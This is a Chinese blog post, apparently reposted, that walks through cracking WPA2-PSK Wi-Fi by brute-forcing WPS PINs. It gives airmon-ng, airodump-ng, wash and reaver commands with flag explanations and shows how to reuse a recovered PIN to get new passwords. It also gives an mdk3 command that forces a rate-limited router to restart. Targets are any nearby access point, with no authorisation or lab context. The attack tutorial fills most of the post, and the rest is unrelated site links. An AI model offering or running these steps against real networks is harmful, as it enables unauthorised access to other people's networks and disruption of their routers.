使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络[通俗易懂]

全栈程序员-站长 • 2022年6月4日上午9:46 • 未分类 • 阅读 36

使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络[通俗易懂]【前言】现在的路由器大多都默认用WPA2-PSK方式对无线网络进行加密了，不能再像WEP加密方式那样好破解，使用字典又需要费心费力地整理字典，而且字典破解的效率还慢。所以我们需要更有效率的破解方法。好在现在大多数的路由器都提供WPS功能，通过这个功能，用户可以使用PIN码登录到路由器。但这个PIN码的长度只有8位，而且可能的取值只有11000种（注意，不是10…

大家好，又见面了，我是你们的朋友全栈君。

【前言】

现在的路由器大多都默认用 WPA2-PSK 方式对无线网络进行加密了，不能再像 WEP 加密方式那样好破解，使用字典又需要费心费力地整理字典，而且字典破解的效率还慢。所以我们需要更有效率的破解方法。好在现在大多数的路由器都提供 WPS 功能，通过这个功能，用户可以使用 PIN 码登录到路由器。但这个 PIN 码的长度只有 8 位，而且可能的取值只有11000种（注意，不是 10^8 种）。所以我们可以进行简单粗暴的穷举 PIN 码破解，而且我们可以推断出这种破解方法在目标 AP 开启了 WPS 功能的情况下是可以百分之百破解它的。这其实是很老的破解手段了，但至今依然奏效。

【操作步骤】

1、切换无线网卡到监听模式：
airmon-ng start wlan0

2、刺探附近 WLAN 网络（这个命令所跟的参数值可以在步骤1 完成后从提示信息中查看到）：
airodump-ng wlan0mon

使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络[通俗易懂]

3、找出开启了 WPS 功能、可以使用 PIN码登录的路由器，并另外记录下该 AP 的 BSSID（约等于该 AP 的 MAC 地址）：
wash -i wlan0mon

使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络[通俗易懂]

3、开始进行 PIN码穷举破解（注意末尾的参数是 2 个小写字母 v）：
reaver -i wlan0mon -b xx:xx:xx:xx:xx:xx -vv

参数说明：
-i 无线网卡名称
-b 目标AP的mac地址
-a 自动检测目标AP最佳配置
-S 使用最小的DH key，可以提高破解速度
-vv 显示更多的非严重警告（注意这是 2 个小写字母 v）
-d 即delay每穷举一次的闲置时间预设为1秒
-c 信道编号
-p PIN码四位或八位 //可以用8位直接找到密码。

使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络[通俗易懂]

4、等待破解完成（这个破解可能会时间比较长，和你的目标 AP 有关，我当时花费了 12 个小时才破解出来），这期间我们可以查看到穷举破解花费的时间、预计剩余时间、穷举PIN码进度信息：

使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络[通俗易懂]

破解完成后，查看并记录下 PIN码和密码：

使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络[通俗易懂]

5、获取到 PIN码后，以后即便路由器更换了密码，我们也可以很迅速地通过 PIN码重新获得新密码。以上方获取到的信息举例：

reaver -i wlan0mon -b xx:xx:xx:xx:xx:xx -p 12316977

【注意事项】

1、如果在执行 reaver 命令后看到有 WARNING: Failed to associate with xx:xx:xx:xx:xx:xx 这样的提示信息，那么应该是你选择了一个不具备或关闭了 WPS 功能的路由器。这种情况下就执行wash 命令并重新选择一个路由器吧。

2、如果在执行 reaver 命令后看到有 warning detected ap rate limiting waiting 60 seconds before re-checking 这样的提示信息，这表示目标路由器开启了防 PIN破解功能。因为我们是穷举 PIN码进行破解的，当连续使用超过某个次数的 PIN码后，路由器会暂时锁定 WPS 功能一段时间。这种情况下要么我们耐心等待其恢复 WPS 功能，要么执行 mdk3 wlan0mon a -a xx:xx:xx:xx:xx:xx （这是上面的目标AP的MAC地址）命令让路由器主动重启或被动重启以恢复 WPS 功能。

版权声明：本文内容由互联网用户自发贡献，该文观点仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容，请联系我们举报，一经查实，本站将立刻删除。

发布者：全栈程序员-站长，转载请注明出处：https://javaforall.net/136049.html原文链接：https://javaforall.net

赞 (0)

0 0

关于作者

全栈程序员-站长

133.5K 文章

3 粉丝

本网站汇聚当前互联网主流语音，持续更新，欢迎关注公众号“全栈程序员社区”

妙用AccessibilityService黑科技实现微信自动加好友拉人进群聊[通俗易懂]

上一篇 2022年6月4日上午9:36

用批处理文件阻止win10强制更新

下一篇 2022年6月4日上午9:46

VSCode检测到include错误，无法打开源文件

VSCode检测到include错误，无法打开源文件有时候我们的 vscode 会出现无法打开源文件的情况在这里我将展示如何配置 vscode 和解决这个问题配置 C 环境前言一软件安装二配置过程 1 配置环境变量 2 配置 vscodeC C 环境总结前言有很多新人或者老手出现了这个问题但是网上很多解决方法并不方便快捷本人经过反复尝试终于找到一种快捷方法一软件安装首先下载 VSCode 官网上就有然后下载和安装 MinGW 下载地址 https osdn net projects

全栈程序员-站长
2026年3月16日
2
docker command not found_阿里云socket连接数

docker command not found_阿里云socket连接数背景介绍阿里云提醒，服务器需由经典网络迁移至专有网络，迁移完成，启动服务时，原本已经运行了几个月的脚本，报错 10049。127.0.0.1测试无误，ping公网IP也没毛病，百思不得姐。解决方法各方查证，结论如下：阿里云有两种网络①经典网络②专有网络经典网络可以直接绑定公网IP，专有网络绑定公网IP？？不好意思，不行！！why？？？客服是这么讲的“这不是经典网…

全栈程序员-站长
2026年4月20日
5
从源码的角度分析mybatis的核心流程（中）

从源码的角度分析mybatis的核心流程（中）

全栈程序员-站长
2021年8月3日
67
JavaScript语法糖的简析

JavaScript语法糖的简析前言学习 JS 中函数的时候看到了原型链的内容不理解查资料发现了语法糖的定义首先说明一下语法糖的定义百度百科上的定义语法糖 Syntacticsug 也译为糖衣语法是由英国计算机科学家彼得约翰兰达 PeterJ Landin 发明的一个术语指计算机语言中添加的某种语法这种语法对语言的功能并没有影响但是更方便程序员使用正文一构造函数构造函数比较容易理解

全栈程序员-站长
2026年3月26日
1
Opacity 属性引发的层叠问题

Opacity 属性引发的层叠问题Opacity属性引发的层叠问题总结

全栈程序员-站长
2022年5月26日
52
小程序获取用户信息相关获取头像名称微信用户

小程序获取用户信息相关获取头像名称微信用户微信小程序登录信息获取，获取到的姓名”微信用户”以及头像为默认头像，目前只能按照以下方式去改了。以前的getUserInfo已经不能直接调用了，现在只能使用getUserProfile，需要点击触发时间调起，可以做个引导性的点击事件触发。官方公告：https://developers.weixin.qq.com/community/develop/doc/000cacfa20ce88df04cb468bc52801官方文档：https://developers.weixin.qq.com/m

全栈程序员-站长
2022年8月19日
15

发表回复

关注全栈程序员社区公众号